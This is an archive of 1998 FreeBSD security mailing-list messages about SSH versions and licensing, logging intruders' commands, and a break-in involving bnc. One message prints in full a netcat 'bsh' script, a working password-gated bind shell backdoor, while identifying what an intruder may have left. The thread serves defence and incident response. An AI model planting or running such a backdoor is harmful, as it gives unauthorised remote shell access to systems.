> dima@best.net wrote:
> > Grrr, I just went through the license. Sucks.
> > Btw, I was under impression that 1.26 has a fix for the insertion attack...
>
> 1.25 has this.
>
> 2.n is the encumbered version.

Then the case is closed, I guess.
> M
> --
> Mark Murray
> Join the anti-SPAM movement: http://www.cauce.org
>

-- dima

From owner-freebsd-security Thu Aug 27 13:38:53 1998
Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id NAA24512 for freebsd-security-outgoing; Thu, 27 Aug 1998 13:38:53 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from ifi.uio.no (ifi.uio.no [129.240.64.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id NAA24499 for ; Thu, 27 Aug 1998 13:38:38 -0700 (PDT) (envelope-from dag-erli@ifi.uio.no) Received: from hrotti.ifi.uio.no (2602@hrotti.ifi.uio.no [129.240.64.15]) by ifi.uio.no (8.8.8/8.8.7/ifi0.2) with ESMTP id WAA04257; Thu, 27 Aug 1998 22:37:40 +0200 (MET DST) Received: (from dag-erli@localhost) by hrotti.ifi.uio.no ; Thu, 27 Aug 1998 22:37:39 +0200 (MET DST)
Mime-Version: 1.0
To: "Jordan K. Hubbard"
Cc: Andrej.Brodnik@IBC.IskraSistemi.Si (Andrej Brodnik (Andy)), security@FreeBSD.ORG
Subject: Re: post breakin log
References: <7706.904208088@time.cdrom.com>
Organization: University of Oslo, Department of Informatics
X-url: http://www.stud.ifi.uio.no/~dag-erli/ X-other-addresses: 'finger dag-erli@ifi.uio.no' for a list X-disclaimer-1: The views expressed in this article are mine alone, and do X-disclaimer-2: not necessarily coincide with those of any organisation or X-disclaimer-3: company with which I am or have been affiliated. X-Stop-Spam: http://www.cauce.org/
From: dag-erli@ifi.uio.no (Dag-Erling Coidan Smørgrav)
Date: 27 Aug 1998 22:37:39 +0200
In-Reply-To: "Jordan K. Hubbard"'s message of "Thu, 27 Aug 1998 01:54:48 -0700"
Message-ID: Lines: 19 X-Mailer: Gnus v5.5/Emacs 19.34 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by hub.freebsd.org id NAA24500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

"Jordan K. Hubbard" writes:
> > > Watch bugtrax, www.rootshell.org, CERT, etc. Actively admin your
> > > system on a daily basis.
> > Is there a site one can read more on this?
> Not to my knowledge. Alta Vista or your search engine of choice is
> highly recommended. :)

(alpha and omega)
(every root kit in existence...)
(searchable BUGTRAQ archive)
(BUGTRAQ home pages)

The latter is down at the moment (and has been for a while), but as I understand things Aleph1 intends to bring it back up some time. It used to have listings of root exploits by OS version and by app.

DES
--
Dag-Erling Smørgrav - dag-erli@ifi.uio.no

From owner-freebsd-security Thu Aug 27 14:21:33 1998
Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA02628 for freebsd-security-outgoing; Thu, 27 Aug 1998 14:21:33 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from shell6.ba.best.com (shell6.ba.best.com [206.184.139.137]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id OAA02605; Thu, 27 Aug 1998 14:21:16 -0700 (PDT) (envelope-from jkb@best.com) Received: from localhost (jkb@localhost) by shell6.ba.best.com (8.9.0/8.9.0/best.sh) with SMTP id OAA17576; Thu, 27 Aug 1998 14:20:12 -0700 (PDT) X-Authentication-Warning: shell6.ba.best.com: jkb owned process doing -bs
Date: Thu, 27 Aug 1998 14:20:11 -0700 (PDT)
From: "Jan B. Koum "
X-Sender: jkb@shell6.ba.best.com
To: "Ron 'The Insane One' Rosson"
cc: dima@best.net, axl@iafrica.com, freebsd-ports@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Subject: Re: SSH port
In-Reply-To: <19980827115247.B11893@oneinsane.net>
Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

AFAIK both .25 and .26 have the CRC data injection bug fixed:

    % ssh -v -p 139 twentythree.jkb.org
    SSH Version 1.2.25 [i386-unknown-freebsd2.2.6], protocol version 1.5.
    Compiled with RSAREF.
    [snip]
    0wn.jkb.org: Sent encrypted session key.
    0wn.jkb.org: Installing crc compensation attack detector
    0wn.jkb.org: Received encrypted confirmation.
    [snip]

Is there another bug you guys are talking about?

And yes, the license does blow. That means ISPs will have to pay if they want to use ssh2.

-- Yan

www.best.com/~jkb/ Unix users of the world unite:
www.{free,open,net}bsd.org | www.linux.org | www.apache.org | www.perl.com
"Turn up the lights, I don't want to go home in the dark."

On Thu, 27 Aug 1998, Ron 'The Insane One' Rosson wrote:
>On Thu, Aug 27, 1998 at 11:46:40AM -0700, Dima Ruban wrote:
>> Grrr, I just went through the license. Sucks.
>> Btw, I was under impression that 1.26 has a fix for the insertion attack...
>
>If you find the fix for the assertion let me know.. I would like to get this
>one headache cleared up. I love my ssh.
>
>> Ron 'The Insane One' Rosson writes:
>> > On Thu, Aug 27, 1998 at 07:32:42PM +0200, Sheldon Hearn wrote:
>> > > On Thu, 27 Aug 1998 09:21:38 MST, "Ron 'The Insane One' Rosson" wrote:
>> > >
>> > > > Is there a reason why we don't have a port of the ver 2.x
>> > > > ssh?
>> > >
>> > > It may have something to do with the software not being freely
>> > > distributable. This is from the LICENSE document in the tarball:
>> > >
>> > > | THERE IS NO WARRANTY OF ANY KIND FOR THIS SOFTWARE. THIS SOFTWARE IS
>> > > | FOR NON-COMMERCIAL USE ONLY.
>> > > |
>> > > | Please contact Data Fellows for
>> > > | commercial licensing.

From owner-freebsd-security Thu Aug 27 15:07:39 1998
Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id PAA11350 for freebsd-security-outgoing; Thu, 27 Aug 1998 15:07:39 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id PAA11252; Thu, 27 Aug 1998 15:07:05 -0700 (PDT) (envelope-from brett@lariat.org) Received: (from brett@localhost) by lariat.lariat.org (8.8.8/8.8.6) id QAA16656; Thu, 27 Aug 1998 16:06:08 -0600 (MDT)
Message-Id: <199808272206.QAA16656@lariat.lariat.org>
X-Sender: brett@mail.lariat.org X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1.0.49 (Beta)
Date: Thu, 27 Aug 1998 16:05:20 -0600
To: insane@oneinsane.net, freebsd-ports@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
From: Brett Glass
Subject: Re: SSH port
In-Reply-To: <19980827092138.B9553@oneinsane.net>
Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

It may be time for a new rev of SSH anyway. IBM's recently announced method of shutting down known ciphertext "man in the middle" attacks is worth adding to the protocol.

--Brett

At 09:21 AM 8/27/98 -0700, Ron 'The Insane One' Rosson wrote:
>Is there a reason why we don't have a port of the ver 2.x
>ssh? There appears to be an insertion attack in the 1.26
>version that we have in our ports. Sorry for the cross-post
>but this came to my attention from running some tests
>on my own machines.
>TIA
>Ron
>--
>--------------------------------------------------------
>Ron Rosson ... and a UNIX user said ...
>The InSaNe One rm -rf *
>insane@oneinsane.net and all was null and void
>--------------------------------------------------------
>It's so nice to be insane, nobody asks you to explain.
>

From owner-freebsd-security Thu Aug 27 15:58:31 1998
Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id PAA21146 for freebsd-security-outgoing; Thu, 27 Aug 1998 15:58:31 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from ns.mt.sri.com (sri-gw.MT.net [206.127.105.141]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id PAA21106; Thu, 27 Aug 1998 15:58:17 -0700 (PDT) (envelope-from nate@mt.sri.com) Received: from mt.sri.com (rocky.mt.sri.com [206.127.76.100]) by ns.mt.sri.com (8.8.8/8.8.8) with SMTP id QAA12344; Thu, 27 Aug 1998 16:56:49 -0600 (MDT) (envelope-from nate@rocky.mt.sri.com) Received: by mt.sri.com (SMI-8.6/SMI-SVR4) id QAA19327; Thu, 27 Aug 1998 16:56:47 -0600
Date: Thu, 27 Aug 1998 16:56:47 -0600
Message-Id: <199808272256.QAA19327@mt.sri.com>
From: Nate Williams
MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit
To: Mike Holling
Cc: "Ron 'The Insane One' Rosson" , Sheldon Hearn , dima@best.net, freebsd-ports@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Subject: Re: SSH port
In-Reply-To: References: <19980827113954.A11893@oneinsane.net>
X-Mailer: VM 6.34 under 19.16 "Lille" XEmacs Lucid Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

> I believe the 2.x branch is a complete rewrite of the code, done by
> DataFellows. It's essentially a different codebase done by different
> people.

Oooh, that's scary, especially given how buggy their Win32 client is.
:(

Nate

From owner-freebsd-security Thu Aug 27 17:27:22 1998
Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id RAA05762 for freebsd-security-outgoing; Thu, 27 Aug 1998 17:27:22 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id RAA05630 for ; Thu, 27 Aug 1998 17:26:44 -0700 (PDT) (envelope-from brett@lariat.org) Received: (from brett@localhost) by lariat.lariat.org (8.8.8/8.8.6) id SAA18015; Thu, 27 Aug 1998 18:25:37 -0600 (MDT)
Message-Id: <199808280025.SAA18015@lariat.lariat.org>
X-Sender: brett@mail.lariat.org X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1.0.49 (Beta)
Date: Thu, 27 Aug 1998 18:24:46 -0600
To: "Gregory P. Smith" , security@FreeBSD.ORG
From: Brett Glass
Subject: Re: SSH port
In-Reply-To: <199808280021.RAA03533@ryouko.nas.nasa.gov>
References: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Sure. See http://www.research.ibm.com/news/detail/encryption.html

There's an overview and a link to the paper.

--Brett

At 05:21 PM 8/27/98 -0700, Gregory P. Smith wrote:
>
>> It may be time for a new rev of SSH anyway. IBM's recently announced
>> method of shutting down known ciphertext "man in the middle" attacks
>> is worth adding to the protocol.
>
>Care to elaborate on this one (ie: a reference to the announcement or
>an explanation?).
>(cc' the list as others are bound to ask the same
>question :)
>
>Thanks,
>Greg
>

From owner-freebsd-security Thu Aug 27 17:49:16 1998
Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id RAA10426 for freebsd-security-outgoing; Thu, 27 Aug 1998 17:49:16 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from shell.futuresouth.com (shell.futuresouth.com [198.78.58.28]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id RAA10396 for ; Thu, 27 Aug 1998 17:49:05 -0700 (PDT) (envelope-from fullermd@futuresouth.com) Received: (from fullermd@localhost) by shell.futuresouth.com (8.8.8/8.8.8) id TAA08252; Thu, 27 Aug 1998 19:47:59 -0500 (CDT)
Message-ID: <19980827194759.15155@futuresouth.com>
Date: Thu, 27 Aug 1998 19:47:59 -0500
From: "Matthew D. Fuller"
To: Brian Behlendorf
Cc: Wilson MacGyver , security@FreeBSD.ORG
Subject: Re: post breakin log
References: <199808270538.BAA01341@armitage.cylatech.com> <19980827182323.6798.qmail@hyperreal.org>
Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.88
In-Reply-To: <19980827182323.6798.qmail@hyperreal.org>; from Brian Behlendorf on Thu, Aug 27, 1998 at 11:16:01AM -0700
Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On Thu, Aug 27, 1998 at 11:16:01AM -0700, Brian Behlendorf woke me up to tell me:
> At 01:38 AM 8/27/98 -0400, Wilson MacGyver wrote:
> >the log from history follows.
>
> Is there a fool-proof way to get user histories like this? I got one once
> only because the cracker was lame enough to forget to delete his
> .bash_history file. Presuming root isn't compromised of course...

Command accounting's a pretty good way. And if you raise the secure level and set the acct file append-only (sappend flag?), it's pretty foolproof. Very spammable if they catch up, but fairly foolproof.
*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
| FreeBSD; the way computers were meant to be             |
* "The only reason I'm burning my candle at both ends, is *
| that I haven't figured out how to light the middle yet."|
* fullermd@futuresouth.com :-} MAtthew Fuller             *
| http://keystone.westminster.edu/~fullermd               |
*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*

From owner-freebsd-security Thu Aug 27 18:08:20 1998
Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id SAA13604 for freebsd-security-outgoing; Thu, 27 Aug 1998 18:08:20 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from puck.nether.net (puck.nether.net [204.42.254.5]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id SAA13594; Thu, 27 Aug 1998 18:08:13 -0700 (PDT) (envelope-from jared@puck.nether.net) Received: (from jared@localhost) by puck.nether.net (8.9.0/8.7.3) id VAA05914; Thu, 27 Aug 1998 21:07:35 -0400
Message-ID: <19980827210735.D2932@puck.nether.net>
Date: Thu, 27 Aug 1998 21:07:35 -0400
From: Jared Mauch
To: Brett Glass , insane@oneinsane.net, freebsd-ports@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Subject: Re: SSH port
References: <19980827092138.B9553@oneinsane.net> <199808272206.QAA16656@lariat.lariat.org>
Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i
In-Reply-To: <199808272206.QAA16656@lariat.lariat.org>; from Brett Glass on Thu, Aug 27, 1998 at 04:05:20PM -0600
Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

I'm sure some interesting things are happening @ ietf re the ssh protocol.

www.ietf.org for those who aren't ietf savvy

On Thu, Aug 27, 1998 at 04:05:20PM -0600, Brett Glass wrote:
> It may be time for a new rev of SSH anyway.
> IBM's recently announced
> method of shutting down known ciphertext "man in the middle" attacks
> is worth adding to the protocol.
>
> --Brett
>
>
> At 09:21 AM 8/27/98 -0700, Ron 'The Insane One' Rosson wrote:
>
> >Is there a reason why we don't have a port of the ver 2.x
> >ssh? There appears to be an insertion attack in the 1.26
> >version that we have in our ports. Sorry for the cross-post
> >but this came to my attention from running some tests
> >on my own machines.
> >TIA
> >Ron
> >--
> >--------------------------------------------------------
> >Ron Rosson ... and a UNIX user said ...
> >The InSaNe One rm -rf *
> >insane@oneinsane.net and all was null and void
> >--------------------------------------------------------
> >It's so nice to be insane, nobody asks you to explain.
>

--
Jared Mauch | pgp key available via finger from jared@puck.nether.net
| http://puck.nether.net/~jared/

From owner-freebsd-security Thu Aug 27 18:39:25 1998
Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id SAA19775 for freebsd-security-outgoing; Thu, 27 Aug 1998 18:39:25 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from speedy.nethampton.com (speedy.nethampton.com [207.252.75.40]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id SAA19761 for ; Thu, 27 Aug 1998 18:39:13 -0700 (PDT) (envelope-from tplatt@nethampton.com) Date: Thu, 27 Aug 1998 18:39:13 -0700 (PDT) Received: (qmail 13299 invoked from network); 28 Aug 1998 01:36:00 -0000 Received: from teebee.hamptons.com (HELO ?204.141.112.245?) (204.141.112.245) by speedy.nethampton.com with SMTP; 28 Aug 1998 01:36:00 -0000
X-Sender: tplatt@nethampton.com (Unverified)
Message-Id: In-Reply-To: References: <10509.904217819@gjp.erols.com>
Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"
To: security@FreeBSD.ORG
From: "Timothy R. Platt"
Subject: Re: post breakin log
Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Huh? From the bnc distribution README (bnc is in the FreeBSD ports collection, btw):

1.INTRODUCTION
   BNC is a simple program designed to Proxy irc sessions.
   It is user configurable using the file bnc.conf and includes
   multi-user, passwords, and other basic necessities.
   NOW INCLUDES VIRTUAL HOSTS!!! ;P

2.COMPILATION
   I would tell you how to un-tar/gz this file, but you're
   reading this so why would you need help :-)
   To compile bnc simply type:
   make

3.CONFIGURATION
   The configuration file gives BNC the necessary info to
   process such as the port to bind to and what port to request
   when a conn is requested, also passwords and maxusers.

4.LOADING
   type:
   bnc

5.CLIENT SIDE
   When using various clients you connect to the server on
   which the daemon is run. In ircii and other clients you will
   have to give your password by typing /quote pass to
   continue, in Mirc you can simply /server bnc.server.net port pass
   to connect. Once your pass is ok'ed you can tell it to connect
   to an irc server by typing /quote conn [irc.server.net] .

   added /quote VIP [Virtual.host] for on the fly ip switching. It must
   be done before you /quote conn.

6.GNU
   Yeah you know how this works so just realize this is gnu.

This is the only bnc I've seen..

Tim

> Arggh! I just remembered. Gary is correct. If you download netcat
>it comes with some scripts, bnc is one of them. It will listen on a port
>and upon connect will drop you in to shell as root. Please do:
>
># netstat -an | grep LIST
>
>and check to make sure you know what all the ports are.
>If I were you I'd
>re-install since who knows what you've got going with crontab, at, mail
>aliases, etc.
>
>-- Yan
>
>www.best.com/~jkb/ Unix users of the world unite:
>www.{free,open,net}bsd.org | www.linux.org | www.apache.org | www.perl.com
>"Turn up the lights, I don't want to go home in the dark."
>

From owner-freebsd-security Thu Aug 27 19:22:44 1998
Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id TAA27819 for freebsd-security-outgoing; Thu, 27 Aug 1998 19:22:44 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from banshee.cs.uow.edu.au (banshee.cs.uow.edu.au [130.130.188.1]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id TAA27743 for ; Thu, 27 Aug 1998 19:22:23 -0700 (PDT) (envelope-from ncb05@banshee.cs.uow.edu.au) Received: (from ncb05@localhost) by banshee.cs.uow.edu.au (8.9.1/8.9.1) id MAA12967; Fri, 28 Aug 1998 12:21:19 +1000 (EST)
Date: Fri, 28 Aug 1998 12:21:19 +1000 (EST)
From: Nicholas Charles Brawn
X-Sender: ncb05@banshee.cs.uow.edu.au
To: Niall Smart
cc: freebsd-security@FreeBSD.ORG
Subject: Re: trusted path execution patch
In-Reply-To: <199808271937.UAA01055@indigo.ie>
Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On Thu, 27 Aug 1998, Niall Smart wrote:

> On Aug 26, 2:32am, Nicholas Charles Brawn wrote:
> } Subject: trusted path execution patch
>
> > For those not familiar with route's patch (Phrack 52, article 6), it
> > limits the execution of binaries to those in directories designated as
> > "trusted". That being (in this case), those that aren't writable by
> > group or other, and are owned by either root, bin, or have the gid of a
> > "trusted" group.
>
> So are you going to audit all those utilities in the trusted path
> for buffer overflows?
>
> Niall
>
> --
> Niall Smart, rotel@indigo.ie.
> Amaze your friends and annoy your enemies:
> echo '#define if(x) if (!(x))' >> /usr/include/stdio.h
>

Hahah. Well, that's another problem that was pointed out. I'm working on an idea that has been tossed around before to prevent buffer overflows. And no, I'm not suggesting we recompile everything with stackguard. :)

Nick
--
Email: ncb05@uow.edu.au - http://rabble.uow.edu.au/~nick
Key fingerprint = DE 30 33 D3 16 91 C8 8D A7 F8 70 03 B7 77 1A 2A
"When in doubt, ask someone wiser than yourself..." -unknown

From owner-freebsd-security Thu Aug 27 19:34:25 1998
Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id TAA29758 for freebsd-security-outgoing; Thu, 27 Aug 1998 19:34:25 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from gjp.erols.com (alex-va-n008c079.moon.jic.com [206.156.18.89]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id TAA29662 for ; Thu, 27 Aug 1998 19:33:40 -0700 (PDT) (envelope-from gjp@gjp.erols.com) Received: from gjp.erols.com (gjp@localhost.erols.com [127.0.0.1]) by gjp.erols.com (8.8.8/8.8.7) with ESMTP id WAA01656; Thu, 27 Aug 1998 22:32:08 -0400 (EDT) (envelope-from gjp@gjp.erols.com)
X-Mailer: exmh version 2.0.1 12/23/97
To: Brian Behlendorf
cc: Wilson MacGyver , security@FreeBSD.ORG
From: "Gary Palmer"
Subject: Re: post breakin log
In-reply-to: Your message of "Thu, 27 Aug 1998 11:16:01 PDT." <19980827182323.6798.qmail@hyperreal.org>
Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii
Date: Thu, 27 Aug 1998 22:32:08 -0400
Message-ID: <1652.904271528@gjp.erols.com>
Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Brian Behlendorf wrote in message ID <19980827182323.6798.qmail@hyperreal.org>:
> Is there a fool-proof way to get user histories like this?
> I got one once
> only because the cracker was lame enough to forget to delete his
> .bash_history file. Presuming root isn't compromised of course...

Force the history files to be created with the uappend flag set and run with a non-zero security level.

Gary
--
Gary Palmer                                          FreeBSD Core Team Member
FreeBSD: Turning PC's into workstations. See http://www.FreeBSD.ORG/ for info

From owner-freebsd-security Thu Aug 27 19:36:13 1998
Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id TAA00198 for freebsd-security-outgoing; Thu, 27 Aug 1998 19:36:13 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from banshee.cs.uow.edu.au (banshee.cs.uow.edu.au [130.130.188.1]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id TAA29894; Thu, 27 Aug 1998 19:35:04 -0700 (PDT) (envelope-from ncb05@banshee.cs.uow.edu.au) Received: (from ncb05@localhost) by banshee.cs.uow.edu.au (8.9.1/8.9.1) id MAA15684; Fri, 28 Aug 1998 12:33:58 +1000 (EST)
Date: Fri, 28 Aug 1998 12:33:57 +1000 (EST)
From: Nicholas Charles Brawn
X-Sender: ncb05@banshee.cs.uow.edu.au
To: "Jan B. Koum "
cc: "Ron 'The Insane One' Rosson" , dima@best.net, axl@iafrica.com, freebsd-ports@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Subject: Re: SSH port
In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On Thu, 27 Aug 1998, Jan B. Koum wrote:

[snip]
>
> And yes, the license does blow. That means ISPs will have to pay
> if they want to use ssh2
>
> -- Yan
>
> www.best.com/~jkb/ Unix users of the world unite:
> www.{free,open,net}bsd.org | www.linux.org | www.apache.org | www.perl.com
> "Turn up the lights, I don't want to go home in the dark."
>

There are people working on a free ssh replacement (UK-based), which is called "psst".
The URL is http://www.net.lut.ac.uk/psst/. Looks like they need some more developers though.

Nick
--
Email: ncb05@uow.edu.au - http://rabble.uow.edu.au/~nick
Key fingerprint = DE 30 33 D3 16 91 C8 8D A7 F8 70 03 B7 77 1A 2A
"When in doubt, ask someone wiser than yourself..." -unknown

From owner-freebsd-security Thu Aug 27 20:16:30 1998
Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id UAA06767 for freebsd-security-outgoing; Thu, 27 Aug 1998 20:16:30 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from Mercury.unix.acs.cc.unt.edu (mercury.acs.unt.edu [129.120.220.1]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id UAA06703 for ; Thu, 27 Aug 1998 20:16:05 -0700 (PDT) (envelope-from john@unt.edu) Received: from leonardo.cascss.unt.edu (leonardo.cascss.unt.edu [129.120.32.203]) by Mercury.unix.acs.cc.unt.edu (8.8.8/8.8.8) with ESMTP id WAA06006; Thu, 27 Aug 1998 22:15:06 -0500 (CDT) Received: (from john@localhost) by leonardo.cascss.unt.edu (8.8.8/8.6.9) id WAA11164; Thu, 27 Aug 1998 22:12:27 -0500 (CDT)
From: john
Message-Id: <199808280312.WAA11164@leonardo.cascss.unt.edu>
Subject: Re: bnc
In-Reply-To: from "Timothy R. Platt" at "Aug 27, 98 06:39:13 pm"
To: tplatt@nethampton.com (Timothy R. Platt)
Date: Thu, 27 Aug 1998 22:12:26 -0500 (CDT)
Cc: freebsd-security@FreeBSD.ORG
X-Mailer: ELM [version 2.4ME+ PL32 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

We had a breakin on our web server a while back. It was a very simple intrusion--they had sniffed a password and just trounced right in. They installed bnc and it was an irc proxy. I imagine it was the same thing.

> Huh?
> From the bnc distribution README (bnc is in the FreeBSD ports
> collection, btw):
>
> 1.INTRODUCTION
>    BNC is a simple program designed to Proxy irc sessions.
>    It is user configurable using the file bnc.conf and includes
>    multi-user, passwords, and other basic necessities.
>    NOW INCLUDES VIRTUAL HOSTS!!! ;P
>
>
> This is the only bnc I've seen..
>
> Tim
>
>
> > Arggh! I just remembered. Gary is correct. If you download netcat
> >it comes with some scripts, bnc is one of them. It will listen on a port

From owner-freebsd-security Thu Aug 27 20:24:27 1998
Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id UAA07862 for freebsd-security-outgoing; Thu, 27 Aug 1998 20:24:27 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from shell6.ba.best.com (shell6.ba.best.com [206.184.139.137]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id UAA07804 for ; Thu, 27 Aug 1998 20:24:01 -0700 (PDT) (envelope-from jkb@best.com) Received: from localhost (jkb@localhost) by shell6.ba.best.com (8.9.0/8.9.0/best.sh) with SMTP id UAA13916; Thu, 27 Aug 1998 20:21:41 -0700 (PDT) X-Authentication-Warning: shell6.ba.best.com: jkb owned process doing -bs
Date: Thu, 27 Aug 1998 20:21:41 -0700 (PDT)
From: "Jan B. Koum "
X-Sender: jkb@shell6.ba.best.com
To: "Timothy R. Platt"
cc: security@FreeBSD.ORG
Subject: Re: post breakin log
In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Ugh.. you are right. I was thinking of bsh (I guess they both start with b FWIW).

    0wn# pwd
    /usr/home/jkb/nc/scripts
    0wn# cat bsh
    #! /bin/sh
    ## a little wrapper to "password" and re-launch a shell-listener.
    ## Arg is taken as the port to listen on.  Define "NC" to point wherever.
    NC=nc
    ## Called with a port argument: start one nc listener that runs this same
    ## script (-e $0) when a client connects, then exit.  nc with no arguments
    ## reads its options from stdin; LPN is exported so the child sees the port.
    case "$1" in
      ?* )
        LPN="$1"
        export LPN
        sleep 1
        echo "-l -p $LPN -e $0" | $NC > /dev/null 2>&1 &
        echo "launched on port $LPN"
        exit 0
      ;;
    esac
    # here we play inetd
    ## Called by nc with no argument (a client is connected on stdin/stdout):
    ## re-arm the listener for the next client, then read lines until the
    ## "password" arrives and hand this connection an interactive csh.
    echo "-l -p $LPN -e $0" | $NC > /dev/null 2>&1 &
    while read qq ; do
      case "$qq" in
      # here's yer password
      gimme )
        cd /
        exec csh -i
      ;;
      esac
    done

-- Yan

www.best.com/~jkb/ Unix users of the world unite:
www.{free,open,net}bsd.org | www.linux.org | www.apache.org | www.perl.com
"Turn up the lights, I don't want to go home in the dark."

On Thu, 27 Aug 1998, Timothy R. Platt wrote:

>Huh? From the bnc distribution README (bnc is in the FreeBSD ports
>collection, btw):
>
>1.INTRODUCTION
>   BNC is a simple program designed to Proxy irc sessions.
>   It is user configurable using the file bnc.conf and includes
>   NOW INCLUDES VIRTUAL HOSTS!!! ;P
>
>2.COMPILATION
>   I would tell you how to un-tar/gz this file, but you're
>   reading this so why would you need help :-)
>   To compile bnc simply type:
>   make
>
>3.CONFIGURATION
>   The configuration file gives BNC the necessary info to
>   process such as the port to bind to and what port to request
>   when a conn is requested, also passwords and maxusers.
>
>4.LOADING
>   type:
>   bnc
>
>5.CLIENT SIDE
>   When using various clients you connect to the server on
>   which the daemon is run. In ircii and other clients you will
>   have to give your password by typing /quote pass to
>   continue, in Mirc you can simply /server bnc.server.net port pass
>   to connect. Once your pass is ok'ed you can tell it to connect
>   to an irc server by typing /quote conn [irc.server.net] .
>
>   added /quote VIP [Virtual.host] for on the fly ip switching. It must
>   be done before you /quote conn.
>
>
>6.GNU
>   Yeah you know how this works so just realize this is gnu.
>
>   multi-user, passwords, and other basic necessities.

[humiliating stuff snipped]

>
>
>This is the only bnc I've seen..
>
>Tim
>
>
>> Arggh! I just remembered. Gary is correct. If you download netcat
>>it comes with some scripts, bnc is one of them.
